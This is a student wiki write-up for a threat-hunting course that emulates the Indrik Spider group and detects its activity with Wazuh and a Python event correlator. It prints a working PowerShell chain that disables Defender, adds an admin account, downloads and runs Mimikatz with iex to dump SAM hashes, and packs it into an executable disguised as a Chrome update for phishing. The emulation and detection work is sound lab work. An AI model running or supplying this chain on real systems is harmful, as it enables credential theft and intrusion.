Final Project - max-gallagher/SEC-350 GitHub Wiki
Max Gallagher & Maxwell Berry Final Project: Threat Hunting
Deliverable 1: Introduce your threat actor and the specific TTPs you are looking for. Who are they and what is their attribution and motivation. Provide an overview of a specific incident attributed to this attacker.
Threat Actor: Indrik Spider
TTPs:
- User Execution: Malicious File
- Create Admin Account
- Service Stop
- Credential Dumping
Background Info
Indrik Spider is a Russian cybercrime group first identified in 2014. They are best known for operating the Dridex malware, now a well-known banking trojan, and the BitPaymer ransomware. They used Dridex to steal millions of dollars from banks and other organizations until 2017, when they switched to BitPaymer. Indrik Spider as a group was motivated purely by financial gain, but they generally targeted organizations rather than specific individuals.
A specific incident attributed to Indrik Spider is the 2019 ransomware attack on Arizona Beverages, which locked the company out of, and completely wiped, a large number of Windows computers and servers. The attackers used Dridex, delivered through an email attachment, to spread the ransomware throughout Arizona's network and compromise a wide variety of Windows devices. The attack prevented Arizona from doing business digitally for multiple days; according to an insider, the company was "losing millions of dollars a day in sales". It took Arizona over 2 weeks to rebuild their network after this attack.
Source: https://techcrunch.com/2019/04/02/arizona-beverages-ransomware/
Deliverable 2: Create the conditions that generate the telemetry that are associated with at least three of your TTPs. This could be logs, active processes, strange use of powershell, files, callouts to specific IPs or DNS ,hashes etc…
- We decided that the best way to reproduce the TTPs we picked from Indrik Spider was PowerShell scripting: write a script for each step, then combine them into one larger script that is converted into an executable disguised as a different program.
- Originally we planned to do this through Empire, which is how Indrik Spider usually ran their PowerShell scripts, but we learned that it was only compatible with Windows 7.
Turning off Windows Defender
- Before we could do anything with our scripting, we wanted to make sure nothing in Windows would stop us, so we started by turning off Windows Defender.
- This was done by putting the following line at the top of our PowerShell script, so that it runs before any other command:
```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```
Script for Creating an Admin User
```powershell
# The values used in $Username, $Password, $FullName, and $Description can be changed to whatever you need; realistically, full name and description are not necessary
$Username = "Attacker"
$Password = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
$FullName = "Hacker Man"
$Description = "I AM SCARY BOOOOOO"
$User = New-LocalUser -Name $Username -Password $Password -FullName $FullName -Description $Description
Add-LocalGroupMember -Group "Administrators" -Member $Username
```
Script for killing the Google Chrome process (this can be replaced with the process of your choice; we used Chrome because that is what the executable is disguised as)
```powershell
# Get the process ID of Google Chrome
$chromeProcess = Get-Process -Name chrome
# Stop the process
Stop-Process -Id $chromeProcess.Id
```
Script that dumps hashed user credentials to a file that is accessible by the user we just made
- There were many ways we could have gone about finding the hashed credentials, but we decided to use Mimikatz since it is what Indrik Spider most commonly used and it was also accessible to us.
```powershell
# Uses Mimikatz to find the system's credentials and then exports them to a file that is readable by all users (in case the user you made has trouble getting admin)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command token::elevate | Out-Null
Invoke-Mimikatz -Command lsadump::sam | Out-File -FilePath C:\Users\Public\Documents\file.txt
```
Final Combined Script:
```powershell
# Disables Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
# Creates new admin user
$Username = "Attacker"
$Password = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
$FullName = "Hacker Man"
$Description = "I AM SCARY BOOOOOO"
$User = New-LocalUser -Name $Username -Password $Password -FullName $FullName -Description $Description
Add-LocalGroupMember -Group "Administrators" -Member $Username
# Stops the Chrome process
# Get the process ID of Google Chrome
$chromeProcess = Get-Process -Name chrome
# Stop the process
Stop-Process -Id $chromeProcess.Id
# Uses Mimikatz to find the system's credentials and then exports them to a file that is readable by all users (in case the user you made has trouble getting admin)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command token::elevate | Out-Null
Invoke-Mimikatz -Command lsadump::sam | Out-File -FilePath C:\Users\Public\Documents\file.txt
```
Converting this all into an Executable and Disguising it as a Google Chrome Update
- We used a program we found called "PS2EXE" (Download Link: https://github.com/MScholtes/PS2EXE/blob/master/Module/Win-PS2EXE.exe)
- When you open it you are presented with a GUI with 3 main options to fill out:
- For the Source file, select your PowerShell script in the form of a .ps1 file.
- For the Target file, enter the file path and name that the .exe should be saved to; make sure the name ends in .exe, or it will not allow you to make the conversion.
- Lastly, the Icon file section takes whatever you want the icon of the file to be. For this project, where we wanted to replicate a Chrome update, we found an image of the Google Chrome icon and used that.
- An additional setting that is important to check is "Require administrator rights at runtime", as our goal with this executable is to trick the victim into running it as administrator.
- Here is an example of what it should look like once filled out:
- We also decided that the best way to simulate the attacker sending the file was a fake phishing email (Gmail actually detected it as a potential phishing attack, which was a relief given how obvious we made it).
Deliverable 3: Use your chosen detection tools to identify the host, process, file or activity that flags activity by your chosen threat actor. Dashboards in wazuh or your selected SIEM are encouraged, alternatively, canned queries with your conditions are fine too.
Wazuh Configuration
- Once you have successfully installed Wazuh, use the username and password it provides to log in to the Wazuh portal. Once inside you will see a page similar to the one below.
- From the Wazuh portal, navigate to the Agents section. You can do this by clicking the agent count under the "Total agents" label on the Modules page, or by opening the dropdown in the top left corner and clicking Agents.
- After clicking Agents you should see a page similar to the one below.
- On this page you should see a label with a plus sign that says "Deploy new agent"; click it. You should see a page similar to the one below.
- From here you need to enter the details for your new agent. In our case we are using a Windows machine, so we selected the Windows operating system, entered the Wazuh server address, which for us was 172.16.200.10, and assigned the new computer to the Windows group.
- For the fourth step, copy the command shown and run it in a PowerShell shell to install the Wazuh agent on the computer. The command looks similar to the one below.
- Once this has run on your computer, you need to restart the agent. You can do this by running the following command in the same PowerShell shell.
- Now that the Wazuh agent is installed, make sure it will catch everything you want to look for in terms of malware or other suspicious activity.
- You can navigate to the MITRE ATT&CK threat detection tab under Modules.
- Once there, navigate to the Frameworks tab to find the variety of tactics and techniques that Wazuh will log and monitor for you. It should look similar to the screenshot below.
- To check whether anything has been logged or flagged on your system, navigate to Modules, then to your agent, then to Security Events, and finally click the Events tab; you should see a list of events that have taken place on your system.
- This is what a proper Wazuh log for our threat simulation will look like:
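As an added example, not part of the original project, here is the detection logic Deliverable 3 calls for written out as a correlation over Windows event-channel records like the ones the Wazuh agent forwards: Defender real-time protection disabled (Defender Operational 5001, or a script block containing DisableRealtimeMonitoring), a member added to the local Administrators group (Security 4732), and Mimikatz module names in a logged script block (PowerShell Operational 4104), all on one host within ten minutes. The field names `eventID`, `scriptBlockText` and `targetSid` are assumptions modelled on Wazuh's win.system/win.eventdata decoding, and the sample records are constructed; PowerShell script block logging is assumed to be enabled on the client so that 4104 events exist.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
ADMINS_SID = "S-1-5-32-544"  # well-known SID of the built-in Administrators group

def stage_of(ev):
    """Map one forwarded event to a stage of the chain, or None if unrelated."""
    eid, data = ev["eventID"], ev.get("data", {})
    script = data.get("scriptBlockText", "").lower()
    if eid == 5001 or (eid == 4104 and "disablerealtimemonitoring" in script):
        return "defender_off"  # Defender real-time protection turned off
    if eid == 4732 and data.get("targetSid") == ADMINS_SID:
        return "admin_added"   # member added to the local Administrators group
    if eid == 4104 and ("lsadump::" in script or "sekurlsa::" in script):
        return "cred_dump"     # Mimikatz module names in a logged script block
    return None

def correlate(events, required=("defender_off", "admin_added", "cred_dump")):
    """Emit one alert per host whose events cover every required stage within WINDOW."""
    alerts, by_host = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host.setdefault(ev["host"], []).append(ev)
    for host, evs in by_host.items():
        seen = {}  # stage -> time of its latest hit, pruned to the sliding window
        for ev in evs:
            stage = stage_of(ev)
            if stage is None:
                continue
            now = datetime.fromisoformat(ev["time"])
            seen[stage] = now
            seen = {s: t for s, t in seen.items() if now - t <= WINDOW}
            if all(s in seen for s in required):
                alerts.append({"host": host, "stages": sorted(seen),
                               "first": min(seen.values()).isoformat(), "last": now.isoformat()})
                seen = {}  # reset so one chain is not re-alerted on every later event
    return alerts

SAMPLE_EVENTS = [  # constructed records; field names modelled on Wazuh's win.eventdata
    {"host": "WIN10-LAB", "time": "2023-04-20T14:00:01", "eventID": 4104,
     "data": {"scriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"}},
    {"host": "WIN10-LAB", "time": "2023-04-20T14:00:02", "eventID": 5001, "data": {}},
    {"host": "WIN10-LAB", "time": "2023-04-20T14:00:04", "eventID": 4732,
     "data": {"memberName": "Attacker", "targetSid": ADMINS_SID}},
    {"host": "WIN10-LAB", "time": "2023-04-20T14:00:09", "eventID": 4104,
     "data": {"scriptBlockText": "Invoke-Mimikatz -Command lsadump::sam"}},
    # a routine admin action elsewhere: user added to Administrators, nothing else
    {"host": "FILESRV01", "time": "2023-04-20T14:00:04", "eventID": 4732,
     "data": {"memberName": "svc_backup", "targetSid": ADMINS_SID}},
]
```

Running `correlate(SAMPLE_EVENTS)` flags only WIN10-LAB; the lone 4732 on FILESRV01 never completes the chain, which is the point of correlating the stages rather than alerting on each event alone.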
Deliverable 4: Your demonstration should briefly cover the documentation you've written that documents any client modifications (example, enabling PowerShell logging), agent deployment and configuration, server monitoring configuration.
Video Link: https://drive.google.com/file/d/1I76K7yj7tVUbY7REjNcFBkDpuaj3bsPt/view?usp=sharing
Video of executable running, we forgot to include it in main video: https://drive.google.com/file/d/1s6U84ObHfOqjoDMDiIs_gH20czXR0dKC/view
**Deliverable 5: Roles and Responsibilities. Lastly, if you were on a team, discuss who did what and any difficulties encountered in the project. (1 point)**
Max:
- Helped find the threat actor and decide on the TTPs (Deliv 1)
- Researched Indrik Spider and wrote the summary and the write-up of the attack they carried out (Deliv 1)
- Recreated the actor activity, wrote the script and documented the process (Deliv 2)
Maxwell:
- Helped find the threat actor and decide on the TTPs (Deliv 1)
- Worked with and documented Wazuh and figured out how to detect the threat activity (Deliv 3)
Difficulties:
- We planned on working with Empire, as that is what Indrik Spider used when working with PowerShell, but we then learned it did not work with Windows 10.
- Microsoft has tried very hard to stop Mimikatz from being used, so we had to jump through a few hoops to make it work.